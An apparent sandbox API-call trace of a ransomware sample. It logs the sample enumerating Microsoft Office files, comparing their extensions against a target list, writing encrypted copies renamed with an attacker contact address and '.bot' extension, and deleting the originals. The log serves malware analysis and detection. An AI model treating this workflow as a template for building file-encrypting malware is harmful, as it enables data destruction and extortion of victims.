	[0150.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.056] lstrlenW (lpString=".1cd") returned 4
	[0150.056] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.056] lstrlenW (lpString=".jpg") returned 4
	[0150.056] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.057] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0150.057] lstrlenW (lpString="PUB6INTL.REST.IDX_DLL") returned 21
	[0150.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.057] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=269184) returned 1
	[0150.057] CloseHandle (hObject=0x3e8) returned 1
	[0150.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.rest.idx_dll")) returned 0x20
	[0150.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.058] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.058] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0150.058] GetLastError () returned 0x0
	[0150.058] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x41b80, lpOverlapped=0x0) returned 1
	[0150.065] WriteFile (in: hFile=0x3fc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x41b90, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x41b90, lpOverlapped=0x0) returned 1
	[0150.070] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.071] WriteFile (in: hFile=0x3fc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0150.071] SetEndOfFile (hFile=0x3fc) returned 1
	[0150.071] CloseHandle (hObject=0x3fc) returned 1
	[0150.071] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.071] SetEndOfFile (hFile=0x3e8) returned 1
	[0150.078] CloseHandle (hObject=0x3e8) returned 1
	[0150.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.078] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.rest.idx_dll")) returned 1
	[0150.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.080] lstrlenW (lpString=".doc") returned 4
	[0150.080] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.080] lstrlenW (lpString=".docx") returned 5
	[0150.080] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.080] lstrlenW (lpString=".pdf") returned 4
	[0150.080] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.080] lstrlenW (lpString=".xls") returned 4
	[0150.080] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.081] lstrlenW (lpString=".xlsx") returned 5
	[0150.081] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.081] lstrlenW (lpString=".ppt") returned 4
	[0150.081] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.081] lstrlenW (lpString=".zip") returned 4
	[0150.081] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.081] lstrlenW (lpString=".rar") returned 4
	[0150.081] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.081] lstrlenW (lpString=".bz2") returned 4
	[0150.081] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.081] lstrlenW (lpString=".7z") returned 3
	[0150.081] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.081] lstrlenW (lpString=".dbf") returned 4
	[0150.081] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0150.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.081] lstrlenW (lpString=".1cd") returned 4
	[0150.081] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.081] lstrlenW (lpString=".jpg") returned 4
	[0150.081] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.081] lstrlenW (lpString=".doc") returned 4
	[0150.081] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.081] lstrlenW (lpString=".docx") returned 5
	[0150.081] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.081] lstrlenW (lpString=".pdf") returned 4
	[0150.081] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.082] lstrlenW (lpString=".xls") returned 4
	[0150.082] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.082] lstrlenW (lpString=".xlsx") returned 5
	[0150.082] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.082] lstrlenW (lpString=".ppt") returned 4
	[0150.082] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.082] lstrlenW (lpString=".zip") returned 4
	[0150.082] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.082] lstrlenW (lpString=".rar") returned 4
	[0150.082] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.082] lstrlenW (lpString=".bz2") returned 4
	[0150.082] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.082] lstrlenW (lpString=".7z") returned 3
	[0150.082] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.082] lstrlenW (lpString=".dbf") returned 4
	[0150.082] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0150.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.082] lstrlenW (lpString=".1cd") returned 4
	[0150.082] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 69
	[0150.082] lstrlenW (lpString=".jpg") returned 4
	[0150.082] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.082] lstrcmpiW (lpString1=".SCM", lpString2=".bot") returned 1
	[0150.082] lstrlenW (lpString="PUBCOLOR.SCM") returned 12
	[0150.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.083] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=28160) returned 1
	[0150.083] CloseHandle (hObject=0x3e8) returned 1
	[0150.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm")) returned 0x20
	[0150.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.084] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.084] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0150.084] GetLastError () returned 0x0
	[0150.084] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x6e00, lpOverlapped=0x0) returned 1
	[0150.086] WriteFile (in: hFile=0x3fc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x6e10, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x6e10, lpOverlapped=0x0) returned 1
	[0150.090] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.090] WriteFile (in: hFile=0x3fc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.090] SetEndOfFile (hFile=0x3fc) returned 1
	[0150.091] CloseHandle (hObject=0x3fc) returned 1
	[0150.091] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.091] SetEndOfFile (hFile=0x3e8) returned 1
	[0150.093] CloseHandle (hObject=0x3e8) returned 1
	[0150.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm")) returned 1
	[0150.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.094] lstrlenW (lpString=".doc") returned 4
	[0150.094] lstrcmpiW (lpString1=".doc", lpString2=".SCM") returned -1
	[0150.094] lstrlenW (lpString=".docx") returned 5
	[0150.094] lstrcmpiW (lpString1=".docx", lpString2="R.SCM") returned -1
	[0150.094] lstrlenW (lpString=".pdf") returned 4
	[0150.094] lstrcmpiW (lpString1=".pdf", lpString2=".SCM") returned -1
	[0150.094] lstrlenW (lpString=".xls") returned 4
	[0150.094] lstrcmpiW (lpString1=".xls", lpString2=".SCM") returned 1
	[0150.094] lstrlenW (lpString=".xlsx") returned 5
	[0150.094] lstrcmpiW (lpString1=".xlsx", lpString2="R.SCM") returned -1
	[0150.094] lstrlenW (lpString=".ppt") returned 4
	[0150.094] lstrcmpiW (lpString1=".ppt", lpString2=".SCM") returned -1
	[0150.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.094] lstrlenW (lpString=".zip") returned 4
	[0150.094] lstrcmpiW (lpString1=".zip", lpString2=".SCM") returned 1
	[0150.094] lstrlenW (lpString=".rar") returned 4
	[0150.094] lstrcmpiW (lpString1=".rar", lpString2=".SCM") returned -1
	[0150.094] lstrlenW (lpString=".bz2") returned 4
	[0150.094] lstrcmpiW (lpString1=".bz2", lpString2=".SCM") returned -1
	[0150.094] lstrlenW (lpString=".7z") returned 3
	[0150.094] lstrcmpiW (lpString1=".7z", lpString2="SCM") returned -1
	[0150.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.095] lstrlenW (lpString=".dbf") returned 4
	[0150.095] lstrcmpiW (lpString1=".dbf", lpString2=".SCM") returned -1
	[0150.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.095] lstrlenW (lpString=".1cd") returned 4
	[0150.095] lstrcmpiW (lpString1=".1cd", lpString2=".SCM") returned -1
	[0150.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.095] lstrlenW (lpString=".jpg") returned 4
	[0150.095] lstrcmpiW (lpString1=".jpg", lpString2=".SCM") returned -1
	[0150.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.095] lstrlenW (lpString=".doc") returned 4
	[0150.095] lstrcmpiW (lpString1=".doc", lpString2=".SCM") returned -1
	[0150.095] lstrlenW (lpString=".docx") returned 5
	[0150.095] lstrcmpiW (lpString1=".docx", lpString2="R.SCM") returned -1
	[0150.095] lstrlenW (lpString=".pdf") returned 4
	[0150.095] lstrcmpiW (lpString1=".pdf", lpString2=".SCM") returned -1
	[0150.095] lstrlenW (lpString=".xls") returned 4
	[0150.095] lstrcmpiW (lpString1=".xls", lpString2=".SCM") returned 1
	[0150.095] lstrlenW (lpString=".xlsx") returned 5
	[0150.095] lstrcmpiW (lpString1=".xlsx", lpString2="R.SCM") returned -1
	[0150.095] lstrlenW (lpString=".ppt") returned 4
	[0150.095] lstrcmpiW (lpString1=".ppt", lpString2=".SCM") returned -1
	[0150.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.095] lstrlenW (lpString=".zip") returned 4
	[0150.095] lstrcmpiW (lpString1=".zip", lpString2=".SCM") returned 1
	[0150.096] lstrlenW (lpString=".rar") returned 4
	[0150.096] lstrcmpiW (lpString1=".rar", lpString2=".SCM") returned -1
	[0150.096] lstrlenW (lpString=".bz2") returned 4
	[0150.096] lstrcmpiW (lpString1=".bz2", lpString2=".SCM") returned -1
	[0150.096] lstrlenW (lpString=".7z") returned 3
	[0150.096] lstrcmpiW (lpString1=".7z", lpString2="SCM") returned -1
	[0150.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.096] lstrlenW (lpString=".dbf") returned 4
	[0150.096] lstrcmpiW (lpString1=".dbf", lpString2=".SCM") returned -1
	[0150.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.096] lstrlenW (lpString=".1cd") returned 4
	[0150.096] lstrcmpiW (lpString1=".1cd", lpString2=".SCM") returned -1
	[0150.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 60
	[0150.096] lstrlenW (lpString=".jpg") returned 4
	[0150.096] lstrcmpiW (lpString1=".jpg", lpString2=".SCM") returned -1
	[0150.096] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0150.096] lstrlenW (lpString="PUBWZINT.DLL") returned 12
	[0150.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.134] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=171368) returned 1
	[0150.134] CloseHandle (hObject=0x3f0) returned 1
	[0150.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.dll")) returned 0x20
	[0150.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0150.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.155] lstrlenW (lpString=".doc") returned 4
	[0150.166] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.166] lstrlenW (lpString=".docx") returned 5
	[0150.166] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0150.166] lstrlenW (lpString=".pdf") returned 4
	[0150.166] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.166] lstrlenW (lpString=".xls") returned 4
	[0150.167] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.167] lstrlenW (lpString=".xlsx") returned 5
	[0150.167] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0150.167] lstrlenW (lpString=".ppt") returned 4
	[0150.167] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.167] lstrlenW (lpString=".zip") returned 4
	[0150.167] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.167] lstrlenW (lpString=".rar") returned 4
	[0150.173] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.173] lstrlenW (lpString=".bz2") returned 4
	[0150.173] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.173] lstrlenW (lpString=".7z") returned 3
	[0150.173] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.173] lstrlenW (lpString=".dbf") returned 4
	[0150.173] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.173] lstrlenW (lpString=".1cd") returned 4
	[0150.173] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.173] lstrlenW (lpString=".jpg") returned 4
	[0150.173] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.173] lstrlenW (lpString=".doc") returned 4
	[0150.173] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.173] lstrlenW (lpString=".docx") returned 5
	[0150.173] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0150.173] lstrlenW (lpString=".pdf") returned 4
	[0150.174] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.174] lstrlenW (lpString=".xls") returned 4
	[0150.174] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.174] lstrlenW (lpString=".xlsx") returned 5
	[0150.174] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0150.174] lstrlenW (lpString=".ppt") returned 4
	[0150.174] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.174] lstrlenW (lpString=".zip") returned 4
	[0150.174] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.174] lstrlenW (lpString=".rar") returned 4
	[0150.174] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.174] lstrlenW (lpString=".bz2") returned 4
	[0150.174] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.174] lstrlenW (lpString=".7z") returned 3
	[0150.174] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.174] lstrlenW (lpString=".dbf") returned 4
	[0150.174] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.174] lstrlenW (lpString=".1cd") returned 4
	[0150.174] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.DLL") returned 60
	[0150.174] lstrlenW (lpString=".jpg") returned 4
	[0150.174] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.174] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0150.174] lstrlenW (lpString="QRYINT32.DLL") returned 12
	[0150.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\qryint32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0150.182] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=83808) returned 1
	[0150.182] CloseHandle (hObject=0x3dc) returned 1
	[0150.182] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\qryint32.dll")) returned 0x20
	[0150.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\qryint32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\qryint32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0150.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.203] lstrlenW (lpString=".doc") returned 4
	[0150.204] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.219] lstrlenW (lpString=".docx") returned 5
	[0150.219] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0150.219] lstrlenW (lpString=".pdf") returned 4
	[0150.220] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.220] lstrlenW (lpString=".xls") returned 4
	[0150.220] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.220] lstrlenW (lpString=".xlsx") returned 5
	[0150.220] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0150.220] lstrlenW (lpString=".ppt") returned 4
	[0150.220] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.220] lstrlenW (lpString=".zip") returned 4
